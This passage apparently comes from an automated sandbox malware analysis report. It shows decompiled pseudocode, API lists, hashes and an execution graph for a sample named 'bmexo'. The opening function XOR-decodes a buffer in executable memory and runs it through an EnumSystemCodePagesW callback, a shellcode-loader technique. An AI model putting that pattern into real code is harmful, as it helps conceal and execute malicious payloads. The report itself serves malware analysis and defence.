						 *((char*)(_t21 + _t28)) = (( *((intOrPtr*)(_t21 + _t28)) + 0x00000001 ^ 0x000000cc) - 0x00000076 ^ 0x000000d6) + 2;
						_t28 = _t28 + 1;
					} while (_t28 < 0x12ca);
					EnumSystemCodePagesW(_t21, 0);
				}
				return 0;
			}














                                          0x00f21004
                                          0x00f2100c
                                          0x00f2100e
                                          0x00f21013
                                          0x00f2101d
                                          0x00f21020
                                          0x00f21044
                                          0x00f21048
                                          0x00f2104d
                                          0x00f21055
                                          0x00f21062
                                          0x00f2106a
                                          0x00f21077
                                          0x00f2107a
                                          0x00f2107b
                                          0x00f21082
                                          0x00f21082
                                          0x00f2108e

                                          APIs
                                          • _malloc.LIBCMT ref: 00F2100E
                                            • Part of subcall function 00F2114B: __FF_MSGBANNER.LIBCMT ref: 00F21162
                                            • Part of subcall function 00F2114B: __NMSG_WRITE.LIBCMT ref: 00F21169
                                            • Part of subcall function 00F2114B: HeapAlloc.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000,?,00F248C7,00000000,00000000,00000000,00000000,?,00F244F9,00000018,00F32280), ref: 00F2118E
                                            • Part of subcall function 00F211DD: __wfsopen.LIBCMT ref: 00F211E8
                                          • VirtualAlloc.KERNEL32(00000000,000012CA,00003000,00000040), ref: 00F21036
                                          • __fread_nolock.LIBCMT ref: 00F21048
                                          • _memset.LIBCMT ref: 00F21062
                                          • EnumSystemCodePagesW.KERNEL32(00000000,00000000), ref: 00F21082
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1052302354.0000000000F21000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F20000, based on PE: true
                                          • Associated: 00000006.00000002.1052293820.0000000000F20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000006.00000002.1052319704.0000000000F2E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000006.00000002.1052334096.0000000000F33000.00000008.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000006.00000002.1052343640.0000000000F37000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_f20000_bmexo.jbxd
                                          Similarity
                                          • API ID: Alloc$CodeEnumHeapPagesSystemVirtual__fread_nolock__wfsopen_malloc_memset
                                          • String ID:
                                          • API String ID: 612201108-0
                                          • Opcode ID: b4443fc9f31c86e9626f505bb256d3715e66e7e01f1617729c9f78fbb140f8ae
                                          • Instruction ID: b85017fdeed459ce3e2837d68eeccf53ea42e267804486f930ddcc8d970817ca
                                          • Opcode Fuzzy Hash: b4443fc9f31c86e9626f505bb256d3715e66e7e01f1617729c9f78fbb140f8ae
                                          • Instruction Fuzzy Hash: D70147729003587BE7206771AC4BFDF3B9CEB61764F100461FA0197182E5B89802A27C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 009C53A5 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 45%
                                          			E009C53A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				void* _t48;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x00a801c0;
									_push(_t92);
									_push(0);
									_t37 = E0099F8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = L009E4FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									L009F3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									L009F3F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E00A2217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									L009F3F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E009E3915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E009C5384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E0099F970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E009E3915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E0099F970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E009E3915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E0099F970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E009E3915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L38;
													}
													E009C5329(_t74, _t92);
													_push(1);
													_t48 = E009C53A5(_t92);
													return _t48;
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L38;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L38:
			}


























                                          0x009c53ab
                                          0x009c53ae
                                          0x009c53b1
                                          0x009c53b4
                                          0x009c53b7
                                          0x009e05b6
                                          0x009e05c0
                                          0x009e05c3
                                          0x00000000
                                          0x009e05c9
                                          0x009e05c9
                                          0x009e05cc
                                          0x009e05d5
                                          0x009e05d5
                                          0x009c53bd
                                          0x009c53bd
                                          0x009c53bd
                                          0x009c53be
                                          0x009c53be
                                          0x009c53be
                                          0x009c53c0
                                          0x00000000
                                          0x00000000
                                          0x00a02269
                                          0x00a0226d
                                          0x00a02349
                                          0x00a0234d
                                          0x00a02273
                                          0x00a02276
                                          0x00a02279
                                          0x00a0227e
                                          0x00a02283
                                          0x00a02287
                                          0x00a0228a
                                          0x00a0228d
                                          0x00a0228f
                                          0x00a022bc
                                          0x00a022bc
                                          0x00a022bc
                                          0x00a022be
                                          0x00a022c4
                                          0x00a022cc
                                          0x00a022d0
                                          0x00a022d6
                                          0x00a022d7
                                          0x00a022da
                                          0x00a022df
                                          0x00a022e4
                                          0x00000000
                                          0x00000000
                                          0x00a022e6
                                          0x00a022e9
                                          0x00a022f4
                                          0x00a022f9
                                          0x00a022fa
                                          0x00a02305
                                          0x00a02314
                                          0x00a02319
                                          0x00a0231a
                                          0x00a0231d
                                          0x00a02320
                                          0x00a02323
                                          0x00a02323
                                          0x00a02328
                                          0x00a0232d
                                          0x00a0232f
                                          0x00a02331
                                          0x00a02336
                                          0x00a02336
                                          0x00a0233b
                                          0x00a0233d
                                          0x00a02350
                                          0x00a02351
                                          0x00a02356
                                          0x00a02359
                                          0x00a02359
                                          0x00a0235b
                                          0x00a0235d
                                          0x009c5367
                                          0x009c536b
                                          0x009c5372
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00a02363
                                          0x00a02363
                                          0x00a02369
                                          0x00a0236a
                                          0x00a0236c
                                          0x00a02371
                                          0x00a02373
                                          0x00000000
                                          0x00a02379
                                          0x00a02379
                                          0x00a0237a
                                          0x00a0237f
                                          0x00a0237f
                                          0x00a02385
                                          0x00a02386
                                          0x00a02389
                                          0x00a0238e
                                          0x00a02390
                                          0x009c5378
                                          0x009c537c
                                          0x00a02396
                                          0x00a02396
                                          0x00a02397
                                          0x00a0239c
                                          0x00a023a2
                                          0x00a023a3
                                          0x00a023a6
                                          0x00a023ab
                                          0x00a023ad
                                          0x00000000
                                          0x00a023b3
                                          0x00a023b3
                                          0x00a023b4
                                          0x00a023b9
                                          0x00a023ba
                                          0x00a023ba
                                          0x00a023bc
                                          0x00a023bf
                                          0x00000000
                                          0x00000000
                                          0x009f9153
                                          0x009f9158
                                          0x009f915a
                                          0x009f915e
                                          0x009f9160
                                          0x00000000
                                          0x009f9166
                                          0x009f9166
                                          0x009f9171
                                          0x009f9176
                                          0x009f9176
                                          0x00000000
                                          0x009f9160
                                          0x00a023c6
                                          0x00a023cb
                                          0x00a023ce
                                          0x00a023d7
                                          0x00a023d7
                                          0x00a023ad
                                          0x00a02390
                                          0x00a02373
                                          0x00a0233f
                                          0x00a0233f
                                          0x00000000
                                          0x00a0233f
                                          0x00a02291
                                          0x00a02291
                                          0x00a02293
                                          0x00a02295
                                          0x00a0229a
                                          0x00a022a1
                                          0x00a022a3
                                          0x00a022a7
                                          0x00a022a9
                                          0x00000000
                                          0x00000000
                                          0x00a022ab
                                          0x00a022ad
                                          0x00a022af
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00a022af
                                          0x00a022b1
                                          0x00a022b4
                                          0x00a022b4
                                          0x00a022b6
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00a022b6
                                          0x00a0228f
                                          0x00000000
                                          0x00a0226d
                                          0x009c53cb
                                          0x009c53ce
                                          0x009c53d0
                                          0x009c53d4
                                          0x009c53d6
                                          0x00000000
                                          0x009c53d8
                                          0x009c53e3
                                          0x009c53ea
                                          0x009c53ea
                                          0x009c53d6
                                          0x00000000

                                          APIs
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A022F4
                                          Strings
                                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00A022FC
                                          • RTL: Resource at %p, xrefs: 00A0230B
                                          • RTL: Re-Waiting, xrefs: 00A02328
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050432541.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                          • Associated: 00000006.00000002.1050424338.0000000000980000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051422283.0000000000A70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051432304.0000000000A80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051440727.0000000000A84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051450489.0000000000A87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051476372.0000000000A90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051559684.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_980000_bmexo.jbxd
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                          • API String ID: 885266447-871070163
                                          • Opcode ID: bbd54237301702c2e372daa391cbd9c7fe640b65595180a6dbe78d931b187ec8
                                          • Instruction ID: 3b28890216afc1eddb79998d31d0e1349ec28625c4a84119a3cd6c98056ddf1d
                                          • Opcode Fuzzy Hash: bbd54237301702c2e372daa391cbd9c7fe640b65595180a6dbe78d931b187ec8
                                          • Instruction Fuzzy Hash: 85514871600745ABEF11DB69DC85FA673ACAFD8360F114229FD08DB2C1EB61ED8187A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F291C6 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00F291C6(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v12;
				signed int _v20;
				signed int _t35;
				int _t38;
				signed int _t41;
				int _t42;
				intOrPtr* _t44;
				int _t47;
				short* _t49;
				intOrPtr _t50;
				intOrPtr _t54;
				int _t55;
				signed int _t59;
				char* _t62;

				_t62 = _a8;
				if(_t62 == 0) {
					L5:
					return 0;
				}
				_t50 = _a12;
				if(_t50 == 0) {
					goto L5;
				}
				if( *_t62 != 0) {
					E00F24BFC( &_v20, _a16);
					_t35 = _v20;
					__eflags =  *(_t35 + 0xa8);
					if( *(_t35 + 0xa8) != 0) {
						_t38 = E00F2917B( *_t62 & 0x000000ff,  &_v20);
						__eflags = _t38;
						if(_t38 == 0) {
							__eflags = _a4;
							_t41 = _v20;
							_t59 = 1;
							_t28 = _t41 + 4; // 0x840ffff8
							_t42 = MultiByteToWideChar( *_t28, 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t42;
							if(_t42 != 0) {
								L21:
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t31 = _t54 + 0x70;
									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t31;
								}
								return _t59;
							}
							L20:
							_t44 = E00F21CC3();
							_t59 = _t59 | 0xffffffff;
							__eflags = _t59;
							 *_t44 = 0x2a;
							goto L21;
						}
						_t59 = _v20;
						__eflags =  *(_t59 + 0x74) - 1;
						if( *(_t59 + 0x74) <= 1) {
							L15:
							_t20 = _t59 + 0x74; // 0xe1c11fe1
							__eflags = _t50 -  *_t20;
							L16:
							if(__eflags < 0) {
								goto L20;
							}
							__eflags = _t62[1];
							if(_t62[1] == 0) {
								goto L20;
							}
							L18:
							_t22 = _t59 + 0x74; // 0xe1c11fe1
							_t59 =  *_t22;
							goto L21;
						}
						_t12 = _t59 + 0x74; // 0xe1c11fe1
						__eflags = _t50 -  *_t12;
						if(__eflags < 0) {
							goto L16;
						}
						__eflags = _a4;
						_t17 = _t59 + 0x74; // 0xe1c11fe1
						_t18 = _t59 + 4; // 0x840ffff8
						_t47 = MultiByteToWideChar( *_t18, 9, _t62,  *_t17, _a4, 0 | _a4 != 0x00000000);
						_t59 = _v20;
						__eflags = _t47;
						if(_t47 != 0) {
							goto L18;
						}
						goto L15;
					}
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 != 0) {
						 *_t55 =  *_t62 & 0x000000ff;
					}
					_t59 = 1;
					goto L21;
				}
				_t49 = _a4;
				if(_t49 != 0) {
					 *_t49 = 0;
				}
				goto L5;
			}


















                                          0x00f291ce
                                          0x00f291d3
                                          0x00f291ed
                                          0x00000000
                                          0x00f291ed
                                          0x00f291d5
                                          0x00f291da
                                          0x00000000
                                          0x00000000
                                          0x00f291df
                                          0x00f291fc
                                          0x00f29201
                                          0x00f29204
                                          0x00f2920b
                                          0x00f2922a
                                          0x00f29231
                                          0x00f29233
                                          0x00f29277
                                          0x00f29283
                                          0x00f29286
                                          0x00f2928b
                                          0x00f2928e
                                          0x00f29294
                                          0x00f29296
                                          0x00f292a6
                                          0x00f292a6
                                          0x00f292aa
                                          0x00f292ac
                                          0x00f292af
                                          0x00f292af
                                          0x00f292af
                                          0x00f292af
                                          0x00000000
                                          0x00f292b5
                                          0x00f29298
                                          0x00f29298
                                          0x00f2929d
                                          0x00f2929d
                                          0x00f292a0
                                          0x00000000
                                          0x00f292a0
                                          0x00f29235
                                          0x00f29238
                                          0x00f2923c
                                          0x00f29265
                                          0x00f29265
                                          0x00f29265
                                          0x00f29268
                                          0x00f29268
                                          0x00000000
                                          0x00000000
                                          0x00f2926a
                                          0x00f2926e
                                          0x00000000
                                          0x00000000
                                          0x00f29270
                                          0x00f29270
                                          0x00f29270
                                          0x00000000
                                          0x00f29270
                                          0x00f2923e
                                          0x00f2923e
                                          0x00f29241
                                          0x00000000
                                          0x00000000
                                          0x00f29245
                                          0x00f2924f
                                          0x00f29255
                                          0x00f29258
                                          0x00f2925e
                                          0x00f29261
                                          0x00f29263
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00f29263
                                          0x00f2920d
                                          0x00f29210
                                          0x00f29212
                                          0x00f29217
                                          0x00f29217
                                          0x00f2921c
                                          0x00000000
                                          0x00f2921c
                                          0x00f291e1
                                          0x00f291e6
                                          0x00f291ea
                                          0x00f291ea
                                          0x00000000

                                          APIs
                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00F291FC
                                          • __isleadbyte_l.LIBCMT ref: 00F2922A
                                          • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,E1C11FE1,00BFBBEF,00000000), ref: 00F29258
                                          • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,00BFBBEF,00000000), ref: 00F2928E
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1052302354.0000000000F21000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F20000, based on PE: true
                                          • Associated: 00000006.00000002.1052293820.0000000000F20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000006.00000002.1052319704.0000000000F2E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000006.00000002.1052334096.0000000000F33000.00000008.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000006.00000002.1052343640.0000000000F37000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_f20000_bmexo.jbxd
                                          Similarity
                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                          • String ID:
                                          • API String ID: 3058430110-0
                                          • Opcode ID: e3c5ecbfb7f4402f8a5ceff8ac18de2e9668d6af25a222035659cdbc9637dd29
                                          • Instruction ID: 34b7bf88b492c4c59b988d285d04bcdaf9f50fc81949221ba18132c730b57abb
                                          • Opcode Fuzzy Hash: e3c5ecbfb7f4402f8a5ceff8ac18de2e9668d6af25a222035659cdbc9637dd29
                                          • Instruction Fuzzy Hash: C131E431A0826AFFDB218F75EC44BAA7BA5FF41320F154128E8648B1E0D7B1D851EB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F2A94D Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00F2A94D(void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E00F2AE9E(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t34 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E00F2A9D3(_a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E00F2B119(__esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E00F2B058(__esi, _t34, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}





                                          0x00f2a950
                                          0x00f2a956
                                          0x00f2a9c9
                                          0x00000000
                                          0x00f2a95d
                                          0x00f2a95d
                                          0x00f2a960
                                          0x00f2a97b
                                          0x00f2a97e
                                          0x00f2a99e
                                          0x00f2a9b0
                                          0x00f2a980
                                          0x00f2a980
                                          0x00f2a983
                                          0x00000000
                                          0x00f2a985
                                          0x00f2a997
                                          0x00f2a997
                                          0x00f2a983
                                          0x00f2a9ce
                                          0x00f2a9d2
                                          0x00f2a962
                                          0x00f2a97a
                                          0x00f2a97a
                                          0x00f2a960

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1052302354.0000000000F21000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F20000, based on PE: true
                                          • Associated: 00000006.00000002.1052293820.0000000000F20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000006.00000002.1052319704.0000000000F2E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000006.00000002.1052334096.0000000000F33000.00000008.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000006.00000002.1052343640.0000000000F37000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_f20000_bmexo.jbxd
                                          Similarity
                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                          • String ID:
                                          • API String ID: 3016257755-0
                                          • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                          • Instruction ID: 0f974109ce9aa9442daa4af383d644670cdb3cd038edc5ee5ffd28896f359a78
                                          • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                          • Instruction Fuzzy Hash: 5F014B7244025EFBCF125E85ED518EE3F27BB18354B5A8515FE2958031D336C9B1BB82
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Execution Graph

                                          Execution Coverage:2.3%
                                          Dynamic/Decrypted Code Coverage:1.7%
                                          Signature Coverage:0%
                                          Total number of Nodes:706
                                          Total number of Limit Nodes:92
                                          execution_graph 72146 af26d 72149 aba60 72146->72149 72150 aba86 72149->72150 72157 99160 72150->72157 72152 aba92 72153 abab6 72152->72153 72165 98440 72152->72165 72197 aa660 72153->72197 72158 9916d 72157->72158 72200 990b0 72157->72200 72160 99174 72158->72160 72212 99050 72158->72212 72160->72152 72166 98467 72165->72166 72630 9a610 72166->72630 72168 98479 72634 9a360 72168->72634 72170 98496 72178 9849d 72170->72178 72687 9a290 LdrLoadDll 72170->72687 72172 985e4 72172->72153 72174 98506 72174->72172 72175 ac0b0 2 API calls 72174->72175 72176 9851c 72175->72176 72177 ac0b0 2 API calls 72176->72177 72179 9852d 72177->72179 72178->72172 72638 9d770 72178->72638 72180 ac0b0 2 API calls 72179->72180 72181 9853e 72180->72181 72650 9b4d0 72181->72650 72183 98551 72184 a56a0 8 API calls 72183->72184 72185 98562 72184->72185 72186 a56a0 8 API calls 72185->72186 72187 98573 72186->72187 72188 98593 72187->72188 72662 9c040 72187->72662 72190 a56a0 8 API calls 72188->72190 72193 985db 72188->72193 72195 985aa 72190->72195 72668 98220 72193->72668 72195->72193 72689 9c0e0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 72195->72689 72198 aaf60 LdrLoadDll 72197->72198 72199 aa67f 72198->72199 72231 a8b80 72200->72231 72204 990d6 72204->72158 72205 990cc 72205->72204 72238 ab310 72205->72238 72207 99113 72207->72204 72249 98ed0 72207->72249 72209 99133 72255 98920 LdrLoadDll 72209->72255 72211 99145 72211->72158 72213 9906a 72212->72213 72214 ab600 LdrLoadDll 72212->72214 72604 ab600 72213->72604 72214->72213 72217 ab600 LdrLoadDll 72218 99091 72217->72218 72219 9d570 72218->72219 72220 9d589 72219->72220 72613 9a490 72220->72613 72222 9d59c 72617 aa190 72222->72617 72224 99185 72224->72152 72227 9d5c2 72228 9d5ed 72227->72228 72623 aa210 72227->72623 72230 aa440 2 API calls 72228->72230 72230->72224 72232 a8b8f 72231->72232 72256 a5aa0 72232->72256 72234 990c3 72235 a8a30 72234->72235 72262 aa5b0 72235->72262 72239 ab329 72238->72239 72269 a56a0 72239->72269 72241 ab341 72242 ab34a 72241->72242 72308 ab150 72241->72308 72242->72207 72244 ab35e 72244->72242 72325 a9eb0 72244->72325 72246 ab392 72246->72246 72330 abee0 72246->72330 72582 97210 72249->72582 72251 98ef1 72251->72209 72252 98eea 72252->72251 72595 974d0 72252->72595 72255->72211 72257 a5aae 72256->72257 72258 a5aba 72256->72258 72257->72258 72261 a5f20 LdrLoadDll 72257->72261 72258->72234 72260 a5c0c 72260->72234 72261->72260 72265 aaf60 72262->72265 72264 a8a45 72264->72205 72266 aafe5 72265->72266 72268 aaf6f 72265->72268 72266->72264 72267 a5aa0 LdrLoadDll 72267->72266 72268->72266 72268->72267 72270 a59d5 72269->72270 72280 a56b4 72269->72280 72270->72241 72273 a57c3 72393 aa410 LdrLoadDll 72273->72393 72274 a57e0 72336 aa310 72274->72336 72277 a57cd 72277->72241 72278 a5807 72279 abee0 2 API calls 72278->72279 72282 a5813 72279->72282 72280->72270 72333 a9c00 72280->72333 72281 a5999 72284 aa440 2 API calls 72281->72284 72282->72277 72282->72281 72283 a59af 72282->72283 72288 a58a2 72282->72288 72402 a53e0 LdrLoadDll NtReadFile NtClose 72283->72402 72285 a59a0 72284->72285 72285->72241 72287 a59c2 72287->72241 72289 a5909 72288->72289 72290 a58b1 72288->72290 72289->72281 72291 a591c 72289->72291 72292 a58ca 72290->72292 72293 a58b6 72290->72293 72395 aa290 72291->72395 72297 a58cf 72292->72297 72298 a58e7 72292->72298 72394 a52a0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 72293->72394 72339 a5340 72297->72339 72298->72285 72351 a5060 72298->72351 72300 a58c0 72300->72241 72302 a597c 72399 aa440 72302->72399 72303 a58dd 72303->72241 72306 a58ff 72306->72241 72307 a5988 72307->72241 72309 ab16b 72308->72309 72310 ab17d 72309->72310 72422 abe60 72309->72422 72310->72244 72312 ab19d 72425 a4cc0 72312->72425 72314 ab1c0 72314->72310 72315 a4cc0 3 API calls 72314->72315 72317 ab1e2 72315->72317 72317->72310 72457 a5fe0 72317->72457 72318 ab26a 72319 ab27a 72318->72319 72552 aaee0 LdrLoadDll 72318->72552 72468 aad50 72319->72468 72322 ab2a8 72547 a9e70 72322->72547 72326 aaf60 LdrLoadDll 72325->72326 72327 a9ecc 72326->72327 72578 238fae8 LdrInitializeThunk 72327->72578 72328 a9ee7 72328->72246 72331 ab3b9 72330->72331 72579 aa620 72330->72579 72331->72207 72334 a5794 72333->72334 72335 aaf60 LdrLoadDll 72333->72335 72334->72273 72334->72274 72334->72277 72335->72334 72337 aa32c NtCreateFile 72336->72337 72338 aaf60 LdrLoadDll 72336->72338 72337->72278 72338->72337 72340 a535c 72339->72340 72341 aa290 LdrLoadDll 72340->72341 72342 a537d 72341->72342 72343 a5398 72342->72343 72344 a5384 72342->72344 72346 aa440 2 API calls 72343->72346 72345 aa440 2 API calls 72344->72345 72347 a538d 72345->72347 72348 a53a1 72346->72348 72347->72303 72403 ac0f0 72348->72403 72350 a53ac 72350->72303 72352 a50ab 72351->72352 72353 a50de 72351->72353 72354 aa290 LdrLoadDll 72352->72354 72355 a5229 72353->72355 72359 a50fa 72353->72359 72357 a50c6 72354->72357 72356 aa290 LdrLoadDll 72355->72356 72365 a5244 72356->72365 72358 aa440 2 API calls 72357->72358 72360 a50cf 72358->72360 72361 aa290 LdrLoadDll 72359->72361 72360->72306 72362 a5115 72361->72362 72363 a511c 72362->72363 72364 a5131 72362->72364 72368 aa440 2 API calls 72363->72368 72369 a514c 